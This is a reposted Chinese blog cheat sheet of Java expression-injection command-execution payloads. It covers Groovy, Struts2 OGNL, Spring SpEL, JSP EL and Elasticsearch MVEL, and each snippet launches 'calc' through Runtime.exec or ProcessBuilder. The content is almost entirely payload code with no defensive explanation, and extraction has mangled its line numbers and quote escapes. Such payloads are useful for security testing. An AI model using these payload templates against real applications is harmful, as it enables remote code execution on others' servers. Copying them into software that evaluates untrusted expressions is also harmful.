【转】http://blog.csdn.net/kk_gods/article/details/51840683
|
1
2
3
4
5
|
java--Groovy命令执行:
static
void
main(args){
def cmd =
"calc"
;
println
"${cmd.execute()}"
;
}
|
|
1
2
3
4
5
|
struts2--OGNL命令执行:
ActionContext AC = ActionContext.getContext();
Map Parameters = (Map)AC.getParameters();
String expression =
"${(new java.lang.ProcessBuilder('calc')).start()}"
;
AC.getValueStack().findValue(expression));
|
|
1
2
3
|
spring--SPEL命令执行:
String expression =
"T(java.lang.Runtime).getRuntime().exec(/"
calc/
")"
;
String result = parser.parseExpression(expression).getValue().toString();
|
|
1
2
3
4
|
JSP--JSTL_EL命令执行
<spring:message text=
"${/"
/
".getClass().forName(/"
java.lang.Runtime/
").getMethod(/"
getRuntime/
",null).invoke(null,null).exec(/"
calc/
",null).toString()}"
>
</spring:message>
|
|
1
2
3
4
5
6
7
8
|
Elasticsearch——MVEL
java
import
org.mvel.MVEL;
public
class
MVELTest {
public
static
void
main(String[] args) {
String expression =
"new java.lang.ProcessBuilder(/"
calc/
").start();"
;
Boolean result = (Boolean) MVEL.eval(expression, vars);
}
}
|
本文转自fatshi51CTO博客,原文链接: http://blog.51cto.com/duallay/1957765,如需转载请自行联系原作者
